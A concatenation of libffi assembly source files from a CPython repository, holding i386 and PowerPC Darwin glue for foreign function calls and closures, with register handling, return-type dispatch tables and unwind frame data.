Lcls_epilogue:
movl %ebp, %esp
popl %ebp
ret
Lcls_retint:
movl (%ecx), %eax
jmp Lcls_epilogue
Lcls_retfloat:
flds (%ecx)
jmp Lcls_epilogue
Lcls_retdouble:
fldl (%ecx)
jmp Lcls_epilogue
Lcls_retldouble:
fldt (%ecx)
jmp Lcls_epilogue
Lcls_retllong:
movl (%ecx), %eax
movl 4(%ecx), %edx
jmp Lcls_epilogue
Lcls_retstruct1:
movsbl (%ecx), %eax
jmp Lcls_epilogue
Lcls_retstruct2:
movswl (%ecx), %eax
jmp Lcls_epilogue
Lcls_retstruct:
lea -8(%ebp),%esp
movl %ebp, %esp
popl %ebp
ret $4
LFE2:
#if !FFI_NO_RAW_API
#define RAW_CLOSURE_CIF_OFFSET ((FFI_TRAMPOLINE_SIZE + 3) & ~3)
#define RAW_CLOSURE_FUN_OFFSET (RAW_CLOSURE_CIF_OFFSET + 4)
#define RAW_CLOSURE_USER_DATA_OFFSET (RAW_CLOSURE_FUN_OFFSET + 4)
#define CIF_FLAGS_OFFSET 20
.align 4
FFI_HIDDEN (ffi_closure_raw_SYSV)
.globl _ffi_closure_raw_SYSV
_ffi_closure_raw_SYSV:
LFB3:
pushl %ebp
LCFI4:
movl %esp, %ebp
LCFI5:
pushl %esi
LCFI6:
subl $36, %esp
movl RAW_CLOSURE_CIF_OFFSET(%eax), %esi /* closure->cif */
movl RAW_CLOSURE_USER_DATA_OFFSET(%eax), %edx /* closure->user_data */
movl %edx, 12(%esp) /* user_data */
leal 8(%ebp), %edx /* __builtin_dwarf_cfa () */
movl %edx, 8(%esp) /* raw_args */
leal -24(%ebp), %edx
movl %edx, 4(%esp) /* &res */
movl %esi, (%esp) /* cif */
call *RAW_CLOSURE_FUN_OFFSET(%eax) /* closure->fun */
movl CIF_FLAGS_OFFSET(%esi), %eax /* rtype */
cmpl $FFI_TYPE_INT, %eax
je Lrcls_retint
cmpl $FFI_TYPE_FLOAT, %eax
je Lrcls_retfloat
cmpl $FFI_TYPE_DOUBLE, %eax
je Lrcls_retdouble
cmpl $FFI_TYPE_LONGDOUBLE, %eax
je Lrcls_retldouble
cmpl $FFI_TYPE_SINT64, %eax
je Lrcls_retllong
Lrcls_epilogue:
addl $36, %esp
popl %esi
popl %ebp
ret
Lrcls_retint:
movl -24(%ebp), %eax
jmp Lrcls_epilogue
Lrcls_retfloat:
flds -24(%ebp)
jmp Lrcls_epilogue
Lrcls_retdouble:
fldl -24(%ebp)
jmp Lrcls_epilogue
Lrcls_retldouble:
fldt -24(%ebp)
jmp Lrcls_epilogue
Lrcls_retllong:
movl -24(%ebp), %eax
movl -20(%ebp), %edx
jmp Lrcls_epilogue
LFE3:
#endif
.section __IMPORT,__jump_table,symbol_stubs,self_modifying_code+pure_instructions,5
L_ffi_closure_SYSV_inner$stub:
.indirect_symbol _ffi_closure_SYSV_inner
hlt ; hlt ; hlt ; hlt ; hlt
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0
LSCIE1:
.long 0x0
.byte 0x1
.ascii "zR\0"
.byte 0x1
.byte 0x7c
.byte 0x8
.byte 0x1
.byte 0x10
.byte 0xc
.byte 0x5
.byte 0x4
.byte 0x88
.byte 0x1
.align 2
LECIE1:
.globl _ffi_call_SYSV.eh
_ffi_call_SYSV.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1
LASFDE1:
.long LASFDE1-EH_frame1
.long LFB1-.
.set L$set$2,LFE1-LFB1
.long L$set$2
.byte 0x0
.byte 0x4
.set L$set$3,LCFI0-LFB1
.long L$set$3
.byte 0xe
.byte 0x8
.byte 0x84
.byte 0x2
.byte 0x4
.set L$set$4,LCFI1-LCFI0
.long L$set$4
.byte 0xd
.byte 0x4
.align 2
LEFDE1:
.globl _ffi_closure_SYSV.eh
_ffi_closure_SYSV.eh:
LSFDE2:
.set L$set$5,LEFDE2-LASFDE2
.long L$set$5
LASFDE2:
.long LASFDE2-EH_frame1
.long LFB2-.
.set L$set$6,LFE2-LFB2
.long L$set$6
.byte 0x0
.byte 0x4
.set L$set$7,LCFI2-LFB2
.long L$set$7
.byte 0xe
.byte 0x8
.byte 0x84
.byte 0x2
.byte 0x4
.set L$set$8,LCFI3-LCFI2
.long L$set$8
.byte 0xd
.byte 0x4
.align 2
LEFDE2:
#if !FFI_NO_RAW_API
.globl _ffi_closure_raw_SYSV.eh
_ffi_closure_raw_SYSV.eh:
LSFDE3:
.set L$set$10,LEFDE3-LASFDE3
.long L$set$10
LASFDE3:
.long LASFDE3-EH_frame1
.long LFB3-.
.set L$set$11,LFE3-LFB3
.long L$set$11
.byte 0x0
.byte 0x4
.set L$set$12,LCFI4-LFB3
.long L$set$12
.byte 0xe
.byte 0x8
.byte 0x84
.byte 0x2
.byte 0x4
.set L$set$13,LCFI5-LCFI4
.long L$set$13
.byte 0xd
.byte 0x4
.byte 0x4
.set L$set$14,LCFI6-LCFI5
.long L$set$14
.byte 0x85
.byte 0x3
.align 2
LEFDE3:
#endif
#endif /* ifndef __x86_64__ */
#endif /* defined __i386__ */
|
akheron/cpython
| 9,719
|
Modules/_ctypes/libffi_osx/powerpc/ppc-darwin.S
|
#if defined(__ppc__) || defined(__ppc64__)
/* -----------------------------------------------------------------------
ppc-darwin.S - Copyright (c) 2000 John Hornkvist
Copyright (c) 2004 Free Software Foundation, Inc.
PowerPC Assembly glue.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ppc-darwin.h>
#include <architecture/ppc/mode_independent_asm.h>
.text
.align 2
.globl _ffi_prep_args
.text
.align 2
.globl _ffi_call_DARWIN
.text
.align 2
_ffi_call_DARWIN:
LFB0:
mr r12,r8 /* We only need r12 until the call,
so it doesn't have to be saved. */
LFB1:
/* Save the old stack pointer as AP. */
mr r8,r1
LCFI0:
#if defined(__ppc64__)
/* Allocate the stack space we need.
r4 (size of input data)
48 bytes (linkage area)
40 bytes (saved registers)
8 bytes (extra FPR)
r4 + 96 bytes total
*/
addi r4,r4,-96 // Add our overhead.
li r0,-32 // Align to 32 bytes.
and r4,r4,r0
#endif
stgux r1,r1,r4 // Grow the stack.
mflr r9
/* Save registers we use. */
#if defined(__ppc64__)
std r27,-40(r8)
#endif
stg r28,MODE_CHOICE(-16,-32)(r8)
stg r29,MODE_CHOICE(-12,-24)(r8)
stg r30,MODE_CHOICE(-8,-16)(r8)
stg r31,MODE_CHOICE(-4,-8)(r8)
stg r9,SF_RETURN(r8) /* return address */
#if !defined(POWERPC_DARWIN) /* TOC unused in OS X */
stg r2,MODE_CHOICE(20,40)(r1)
#endif
LCFI1:
#if defined(__ppc64__)
mr r27,r3 // our extended_cif
#endif
/* Save arguments over call. */
mr r31,r5 /* flags, */
mr r30,r6 /* rvalue, */
mr r29,r7 /* function address, */
mr r28,r8 /* our AP. */
LCFI2:
/* Call ffi_prep_args. */
mr r4,r1
li r9,0
mtctr r12 /* r12 holds address of _ffi_prep_args. */
bctrl
#if !defined(POWERPC_DARWIN) /* TOC unused in OS X */
lg r2,MODE_CHOICE(20,40)(r1)
#endif
/* Now do the call.
Set up cr1 with bits 4-7 of the flags. */
mtcrf 0x40,r31
/* Load all those argument registers.
We have set up a nice stack frame, just load it into registers. */
lg r3,SF_ARG1(r1)
lg r4,SF_ARG2(r1)
lg r5,SF_ARG3(r1)
lg r6,SF_ARG4(r1)
nop
lg r7,SF_ARG5(r1)
lg r8,SF_ARG6(r1)
lg r9,SF_ARG7(r1)
lg r10,SF_ARG8(r1)
/* Load all the FP registers. */
bf 6,L2 /* No floats to load. */
#if defined(__ppc64__)
lfd f1,MODE_CHOICE(-16,-40)-(14*8)(r28)
lfd f2,MODE_CHOICE(-16,-40)-(13*8)(r28)
lfd f3,MODE_CHOICE(-16,-40)-(12*8)(r28)
lfd f4,MODE_CHOICE(-16,-40)-(11*8)(r28)
nop
lfd f5,MODE_CHOICE(-16,-40)-(10*8)(r28)
lfd f6,MODE_CHOICE(-16,-40)-(9*8)(r28)
lfd f7,MODE_CHOICE(-16,-40)-(8*8)(r28)
lfd f8,MODE_CHOICE(-16,-40)-(7*8)(r28)
nop
lfd f9,MODE_CHOICE(-16,-40)-(6*8)(r28)
lfd f10,MODE_CHOICE(-16,-40)-(5*8)(r28)
lfd f11,MODE_CHOICE(-16,-40)-(4*8)(r28)
lfd f12,MODE_CHOICE(-16,-40)-(3*8)(r28)
nop
lfd f13,MODE_CHOICE(-16,-40)-(2*8)(r28)
lfd f14,MODE_CHOICE(-16,-40)-(1*8)(r28)
#elif defined(__ppc__)
lfd f1,MODE_CHOICE(-16,-40)-(13*8)(r28)
lfd f2,MODE_CHOICE(-16,-40)-(12*8)(r28)
lfd f3,MODE_CHOICE(-16,-40)-(11*8)(r28)
lfd f4,MODE_CHOICE(-16,-40)-(10*8)(r28)
nop
lfd f5,MODE_CHOICE(-16,-40)-(9*8)(r28)
lfd f6,MODE_CHOICE(-16,-40)-(8*8)(r28)
lfd f7,MODE_CHOICE(-16,-40)-(7*8)(r28)
lfd f8,MODE_CHOICE(-16,-40)-(6*8)(r28)
nop
lfd f9,MODE_CHOICE(-16,-40)-(5*8)(r28)
lfd f10,MODE_CHOICE(-16,-40)-(4*8)(r28)
lfd f11,MODE_CHOICE(-16,-40)-(3*8)(r28)
lfd f12,MODE_CHOICE(-16,-40)-(2*8)(r28)
nop
lfd f13,MODE_CHOICE(-16,-40)-(1*8)(r28)
#else
#error undefined architecture
#endif
L2:
mr r12,r29 // Put the target address in r12 as specified.
mtctr r12 // Get the address to call into CTR.
nop
nop
bctrl // Make the call.
// Deal with the return value.
#if defined(__ppc64__)
mtcrf 0x3,r31 // flags in cr6 and cr7
bt 27,L(st_return_value)
#elif defined(__ppc__)
mtcrf 0x1,r31 // flags in cr7
#else
#error undefined architecture
#endif
bt 30,L(done_return_value)
bt 29,L(fp_return_value)
stg r3,0(r30)
#if defined(__ppc__)
bf 28,L(done_return_value) // Store the second long if necessary.
stg r4,4(r30)
#endif
// Fall through
L(done_return_value):
lg r1,0(r1) // Restore stack pointer.
// Restore the registers we used.
lg r9,SF_RETURN(r1) // return address
lg r31,MODE_CHOICE(-4,-8)(r1)
mtlr r9
lg r30,MODE_CHOICE(-8,-16)(r1)
lg r29,MODE_CHOICE(-12,-24)(r1)
lg r28,MODE_CHOICE(-16,-32)(r1)
#if defined(__ppc64__)
ld r27,-40(r1)
#endif
blr
#if defined(__ppc64__)
L(st_return_value):
// Grow the stack enough to fit the registers. Leave room for 8 args
// to trample the 1st 8 slots in param area.
stgu r1,-SF_ROUND(280)(r1) // 64 + 104 + 48 + 64
// Store GPRs
std r3,SF_ARG9(r1)
std r4,SF_ARG10(r1)
std r5,SF_ARG11(r1)
std r6,SF_ARG12(r1)
nop
std r7,SF_ARG13(r1)
std r8,SF_ARG14(r1)
std r9,SF_ARG15(r1)
std r10,SF_ARG16(r1)
// Store FPRs
nop
bf 26,L(call_struct_to_ram_form)
stfd f1,SF_ARG17(r1)
stfd f2,SF_ARG18(r1)
stfd f3,SF_ARG19(r1)
stfd f4,SF_ARG20(r1)
nop
stfd f5,SF_ARG21(r1)
stfd f6,SF_ARG22(r1)
stfd f7,SF_ARG23(r1)
stfd f8,SF_ARG24(r1)
nop
stfd f9,SF_ARG25(r1)
stfd f10,SF_ARG26(r1)
stfd f11,SF_ARG27(r1)
stfd f12,SF_ARG28(r1)
nop
stfd f13,SF_ARG29(r1)
L(call_struct_to_ram_form):
ld r3,0(r27) // extended_cif->cif*
ld r3,16(r3) // ffi_cif->rtype*
addi r4,r1,SF_ARG9 // stored GPRs
addi r6,r1,SF_ARG17 // stored FPRs
li r5,0 // GPR size ptr (NULL)
li r7,0 // FPR size ptr (NULL)
li r8,0 // FPR count ptr (NULL)
li r10,0 // struct offset (NULL)
mr r9,r30 // return area
bl Lffi64_struct_to_ram_form$stub
lg r1,0(r1) // Restore stack pointer.
b L(done_return_value)
#endif
L(fp_return_value):
/* Do we have long double to store? */
bf 31,L(fd_return_value)
stfd f1,0(r30)
stfd f2,8(r30)
b L(done_return_value)
L(fd_return_value):
/* Do we have double to store? */
bf 28,L(float_return_value)
stfd f1,0(r30)
b L(done_return_value)
L(float_return_value):
/* We only have a float to store. */
stfs f1,0(r30)
b L(done_return_value)
LFE1:
/* END(_ffi_call_DARWIN) */
/* Provide a null definition of _ffi_call_AIX. */
.text
.align 2
.globl _ffi_call_AIX
.text
.align 2
_ffi_call_AIX:
blr
/* END(_ffi_call_AIX) */
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0 ; Length of Common Information Entry
LSCIE1:
.long 0x0 ; CIE Identifier Tag
.byte 0x1 ; CIE Version
.ascii "zR\0" ; CIE Augmentation
.byte 0x1 ; uleb128 0x1; CIE Code Alignment Factor
.byte 0x7c ; sleb128 -4; CIE Data Alignment Factor
.byte 0x41 ; CIE RA Column
.byte 0x1 ; uleb128 0x1; Augmentation size
.byte 0x10 ; FDE Encoding (pcrel)
.byte 0xc ; DW_CFA_def_cfa
.byte 0x1 ; uleb128 0x1
.byte 0x0 ; uleb128 0x0
.align LOG2_GPR_BYTES
LECIE1:
.globl _ffi_call_DARWIN.eh
_ffi_call_DARWIN.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1 ; FDE Length
LASFDE1:
.long LASFDE1-EH_frame1 ; FDE CIE offset
.g_long LFB0-. ; FDE initial location
.set L$set$3,LFE1-LFB0
.g_long L$set$3 ; FDE address range
.byte 0x0 ; uleb128 0x0; Augmentation size
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$4,LCFI0-LFB1
.long L$set$4
.byte 0xd ; DW_CFA_def_cfa_register
.byte 0x08 ; uleb128 0x08
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$5,LCFI1-LCFI0
.long L$set$5
.byte 0x11 ; DW_CFA_offset_extended_sf
.byte 0x41 ; uleb128 0x41
.byte 0x7e ; sleb128 -2
.byte 0x9f ; DW_CFA_offset, column 0x1f
.byte 0x1 ; uleb128 0x1
.byte 0x9e ; DW_CFA_offset, column 0x1e
.byte 0x2 ; uleb128 0x2
.byte 0x9d ; DW_CFA_offset, column 0x1d
.byte 0x3 ; uleb128 0x3
.byte 0x9c ; DW_CFA_offset, column 0x1c
.byte 0x4 ; uleb128 0x4
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$6,LCFI2-LCFI1
.long L$set$6
.byte 0xd ; DW_CFA_def_cfa_register
.byte 0x1c ; uleb128 0x1c
.align LOG2_GPR_BYTES
LEFDE1:
#if defined(__ppc64__)
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi64_struct_to_ram_form$stub:
.indirect_symbol _ffi64_struct_to_ram_form
mflr r0
bcl 20,31,LO$ffi64_struct_to_ram_form
LO$ffi64_struct_to_ram_form:
mflr r11
addis r11,r11,ha16(L_ffi64_struct_to_ram_form$lazy_ptr - LO$ffi64_struct_to_ram_form)
mtlr r0
lgu r12,lo16(L_ffi64_struct_to_ram_form$lazy_ptr - LO$ffi64_struct_to_ram_form)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi64_struct_to_ram_form$lazy_ptr:
.indirect_symbol _ffi64_struct_to_ram_form
.g_long dyld_stub_binding_helper
#endif // __ppc64__
#endif // __ppc__ || __ppc64__
|
akheron/cpython
| 9,914
|
Modules/_ctypes/libffi_osx/powerpc/ppc64-darwin_closure.S
|
#if defined(__ppc64__)
/* -----------------------------------------------------------------------
ppc64-darwin_closure.S - Copyright (c) 2002, 2003, 2004, Free Software Foundation,
Inc. based on ppc_closure.S
PowerPC Assembly glue.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <ffi.h>
#include <ppc-ffitarget.h> // for FFI_TRAMPOLINE_SIZE
#include <ppc-darwin.h>
#include <architecture/ppc/mode_independent_asm.h>
.file "ppc64-darwin_closure.S"
.text
.align LOG2_GPR_BYTES
.globl _ffi_closure_ASM
.text
.align LOG2_GPR_BYTES
_ffi_closure_ASM:
LFB1:
mflr r0
stg r0,SF_RETURN(r1) // save return address
// Save GPRs 3 - 10 (aligned to 8) in the parents outgoing area.
stg r3,SF_ARG1(r1)
stg r4,SF_ARG2(r1)
stg r5,SF_ARG3(r1)
stg r6,SF_ARG4(r1)
stg r7,SF_ARG5(r1)
stg r8,SF_ARG6(r1)
stg r9,SF_ARG7(r1)
stg r10,SF_ARG8(r1)
LCFI0:
/* 48 bytes (Linkage Area)
64 bytes (outgoing parameter area, always reserved)
112 bytes (14*8 for incoming FPR)
? bytes (result)
112 bytes (14*8 for outgoing FPR)
16 bytes (2 saved registers)
352 + ? total bytes
*/
std r31,-8(r1) // Save registers we use.
std r30,-16(r1)
mr r30,r1 // Save the old SP.
mr r31,r11 // Save the ffi_closure around ffi64_data_size.
// Calculate the space we need.
stdu r1,-SF_MINSIZE(r1)
ld r3,FFI_TRAMPOLINE_SIZE(r31) // ffi_closure->cif*
ld r3,16(r3) // ffi_cif->rtype*
bl Lffi64_data_size$stub
ld r1,0(r1)
addi r3,r3,352 // Add our overhead.
neg r3,r3
li r0,-32 // Align to 32 bytes.
and r3,r3,r0
stdux r1,r1,r3 // Grow the stack.
mr r11,r31 // Copy the ffi_closure back.
LCFI1:
// We want to build up an area for the parameters passed
// in registers. (both floating point and integer)
/* 320 bytes (callee stack frame aligned to 32)
48 bytes (caller linkage area)
368 (start of caller parameter area aligned to 8)
*/
// Save FPRs 1 - 14. (aligned to 8)
stfd f1,112(r1)
stfd f2,120(r1)
stfd f3,128(r1)
stfd f4,136(r1)
stfd f5,144(r1)
stfd f6,152(r1)
stfd f7,160(r1)
stfd f8,168(r1)
stfd f9,176(r1)
stfd f10,184(r1)
stfd f11,192(r1)
stfd f12,200(r1)
stfd f13,208(r1)
stfd f14,216(r1)
// Set up registers for the routine that actually does the work.
mr r3,r11 // context pointer from the trampoline
addi r4,r1,224 // result storage
addi r5,r30,SF_ARG1 // saved GPRs
addi r6,r1,112 // saved FPRs
bl Lffi_closure_helper_DARWIN$stub
// Look the proper starting point in table
// by using return type as an offset.
addi r5,r1,224 // Get pointer to results area.
bl Lget_ret_type0_addr // Get pointer to Lret_type0 into LR.
mflr r4 // Move to r4.
slwi r3,r3,4 // Now multiply return type by 16.
add r3,r3,r4 // Add contents of table to table address.
mtctr r3
bctr
LFE1:
// Each of the ret_typeX code fragments has to be exactly 16 bytes long
// (4 instructions). For cache effectiveness we align to a 16 byte
// boundary first.
.align 4
nop
nop
nop
Lget_ret_type0_addr:
blrl
// case FFI_TYPE_VOID
Lret_type0:
b Lfinish
nop
nop
nop
// case FFI_TYPE_INT
Lret_type1:
lwz r3,4(r5)
b Lfinish
nop
nop
// case FFI_TYPE_FLOAT
Lret_type2:
lfs f1,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_DOUBLE
Lret_type3:
lfd f1,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_LONGDOUBLE
Lret_type4:
lfd f1,0(r5)
lfd f2,8(r5)
b Lfinish
nop
// case FFI_TYPE_UINT8
Lret_type5:
lbz r3,7(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT8
Lret_type6:
lbz r3,7(r5)
extsb r3,r3
b Lfinish
nop
// case FFI_TYPE_UINT16
Lret_type7:
lhz r3,6(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT16
Lret_type8:
lha r3,6(r5)
b Lfinish
nop
nop
// case FFI_TYPE_UINT32
Lret_type9: // same as Lret_type1
lwz r3,4(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT32
Lret_type10: // same as Lret_type1
lwz r3,4(r5)
b Lfinish
nop
nop
// case FFI_TYPE_UINT64
Lret_type11:
ld r3,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_SINT64
Lret_type12: // same as Lret_type11
ld r3,0(r5)
b Lfinish
nop
nop
// case FFI_TYPE_STRUCT
Lret_type13:
b Lret_struct
nop
nop
nop
// ** End 16-byte aligned cases **
// case FFI_TYPE_POINTER
// This case assumes that FFI_TYPE_POINTER == FFI_TYPE_LAST. If more types
// are added in future, the following code will need to be updated and
// padded to 16 bytes.
Lret_type14:
lg r3,0(r5)
b Lfinish
// copy struct into registers
Lret_struct:
ld r31,FFI_TRAMPOLINE_SIZE(r31) // ffi_closure->cif*
ld r3,16(r31) // ffi_cif->rtype*
ld r31,24(r31) // ffi_cif->flags
mr r4,r5 // copy struct* to 2nd arg
addi r7,r1,SF_ARG9 // GPR return area
addi r9,r30,-16-(14*8) // FPR return area
li r5,0 // struct offset ptr (NULL)
li r6,0 // FPR used count ptr (NULL)
li r8,0 // GPR return area size ptr (NULL)
li r10,0 // FPR return area size ptr (NULL)
bl Lffi64_struct_to_reg_form$stub
// Load GPRs
ld r3,SF_ARG9(r1)
ld r4,SF_ARG10(r1)
ld r5,SF_ARG11(r1)
ld r6,SF_ARG12(r1)
nop
ld r7,SF_ARG13(r1)
ld r8,SF_ARG14(r1)
ld r9,SF_ARG15(r1)
ld r10,SF_ARG16(r1)
nop
// Load FPRs
mtcrf 0x2,r31
bf 26,Lfinish
lfd f1,-16-(14*8)(r30)
lfd f2,-16-(13*8)(r30)
lfd f3,-16-(12*8)(r30)
lfd f4,-16-(11*8)(r30)
nop
lfd f5,-16-(10*8)(r30)
lfd f6,-16-(9*8)(r30)
lfd f7,-16-(8*8)(r30)
lfd f8,-16-(7*8)(r30)
nop
lfd f9,-16-(6*8)(r30)
lfd f10,-16-(5*8)(r30)
lfd f11,-16-(4*8)(r30)
lfd f12,-16-(3*8)(r30)
nop
lfd f13,-16-(2*8)(r30)
lfd f14,-16-(1*8)(r30)
// Fall through
// case done
Lfinish:
lg r1,0(r1) // Restore stack pointer.
ld r31,-8(r1) // Restore registers we used.
ld r30,-16(r1)
lg r0,SF_RETURN(r1) // Get return address.
mtlr r0 // Reset link register.
blr
// END(ffi_closure_ASM)
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0 ; Length of Common Information Entry
LSCIE1:
.long 0x0 ; CIE Identifier Tag
.byte 0x1 ; CIE Version
.ascii "zR\0" ; CIE Augmentation
.byte 0x1 ; uleb128 0x1; CIE Code Alignment Factor
.byte 0x7c ; sleb128 -4; CIE Data Alignment Factor
.byte 0x41 ; CIE RA Column
.byte 0x1 ; uleb128 0x1; Augmentation size
.byte 0x10 ; FDE Encoding (pcrel)
.byte 0xc ; DW_CFA_def_cfa
.byte 0x1 ; uleb128 0x1
.byte 0x0 ; uleb128 0x0
.align LOG2_GPR_BYTES
LECIE1:
.globl _ffi_closure_ASM.eh
_ffi_closure_ASM.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1 ; FDE Length
LASFDE1:
.long LASFDE1-EH_frame1 ; FDE CIE offset
.g_long LFB1-. ; FDE initial location
.set L$set$3,LFE1-LFB1
.g_long L$set$3 ; FDE address range
.byte 0x0 ; uleb128 0x0; Augmentation size
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$3,LCFI1-LCFI0
.long L$set$3
.byte 0xe ; DW_CFA_def_cfa_offset
.byte 176,1 ; uleb128 176
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$4,LCFI0-LFB1
.long L$set$4
.byte 0x11 ; DW_CFA_offset_extended_sf
.byte 0x41 ; uleb128 0x41
.byte 0x7e ; sleb128 -2
.align LOG2_GPR_BYTES
LEFDE1:
.data
.align LOG2_GPR_BYTES
LDFCM0:
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi_closure_helper_DARWIN$stub:
.indirect_symbol _ffi_closure_helper_DARWIN
mflr r0
bcl 20,31,LO$ffi_closure_helper_DARWIN
LO$ffi_closure_helper_DARWIN:
mflr r11
addis r11,r11,ha16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)
mtlr r0
lgu r12,lo16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi_closure_helper_DARWIN$lazy_ptr:
.indirect_symbol _ffi_closure_helper_DARWIN
.g_long dyld_stub_binding_helper
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi64_struct_to_reg_form$stub:
.indirect_symbol _ffi64_struct_to_reg_form
mflr r0
bcl 20,31,LO$ffi64_struct_to_reg_form
LO$ffi64_struct_to_reg_form:
mflr r11
addis r11,r11,ha16(L_ffi64_struct_to_reg_form$lazy_ptr - LO$ffi64_struct_to_reg_form)
mtlr r0
lgu r12,lo16(L_ffi64_struct_to_reg_form$lazy_ptr - LO$ffi64_struct_to_reg_form)(r11)
mtctr r12
bctr
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi64_data_size$stub:
.indirect_symbol _ffi64_data_size
mflr r0
bcl 20,31,LO$ffi64_data_size
LO$ffi64_data_size:
mflr r11
addis r11,r11,ha16(L_ffi64_data_size$lazy_ptr - LO$ffi64_data_size)
mtlr r0
lgu r12,lo16(L_ffi64_data_size$lazy_ptr - LO$ffi64_data_size)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi64_struct_to_reg_form$lazy_ptr:
.indirect_symbol _ffi64_struct_to_reg_form
.g_long dyld_stub_binding_helper
L_ffi64_data_size$lazy_ptr:
.indirect_symbol _ffi64_data_size
.g_long dyld_stub_binding_helper
#endif // __ppc64__
|
akheron/cpython
| 7,234
|
Modules/_ctypes/libffi_osx/powerpc/ppc-darwin_closure.S
|
#if defined(__ppc__)
/* -----------------------------------------------------------------------
ppc-darwin_closure.S - Copyright (c) 2002, 2003, 2004, Free Software Foundation,
Inc. based on ppc_closure.S
PowerPC Assembly glue.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <ffi.h>
#include <ppc-ffitarget.h> // for FFI_TRAMPOLINE_SIZE
#include <ppc-darwin.h>
#include <architecture/ppc/mode_independent_asm.h>
.file "ppc-darwin_closure.S"
.text
.align LOG2_GPR_BYTES
.globl _ffi_closure_ASM
.text
.align LOG2_GPR_BYTES
_ffi_closure_ASM:
LFB1:
mflr r0 // Save return address
stg r0,SF_RETURN(r1)
LCFI0:
/* 24/48 bytes (Linkage Area)
32/64 bytes (outgoing parameter area, always reserved)
104 bytes (13*8 from FPR)
16/32 bytes (result)
176/232 total bytes */
/* skip over caller save area and keep stack aligned to 16/32. */
stgu r1,-SF_ROUND(176)(r1)
LCFI1:
/* We want to build up an area for the parameters passed
in registers. (both floating point and integer) */
